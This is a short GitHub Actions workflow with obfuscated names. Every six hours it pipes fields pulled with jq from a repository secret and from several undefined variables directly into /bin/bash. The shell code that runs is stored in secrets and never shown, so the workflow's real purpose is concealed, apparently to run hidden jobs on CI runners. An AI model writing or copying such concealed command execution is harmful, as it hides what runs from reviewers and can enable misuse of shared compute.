name: caozhang19870101
on:
  workflow_dispatch:
  schedule:
    - cron: '22 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: caozhang19870101
        env:
          b6: ${{ secrets.b6 }}
        run: |
          echo $b6 | jq -r .cpwq3939 | /bin/bash
          echo $xqxz7878 | jq -r .d402 | /bin/bash
          echo $msto1787 | jq -r .hk1348 | /bin/bash
          echo $he30268 | jq -r .yilye20852 | /bin/bash
          echo $qshby624 | jq -r .y15 | /bin/bash
          echo $fbasn35692 | jq -r .pv20125 | /bin/bash
          echo $ywxz08964 | jq -r .d50662 | /bin/bash
          echo $jsol1 | jq -r .drch0028 | /bin/bash
          echo $d045 | jq -r .eemi59 | /bin/bash

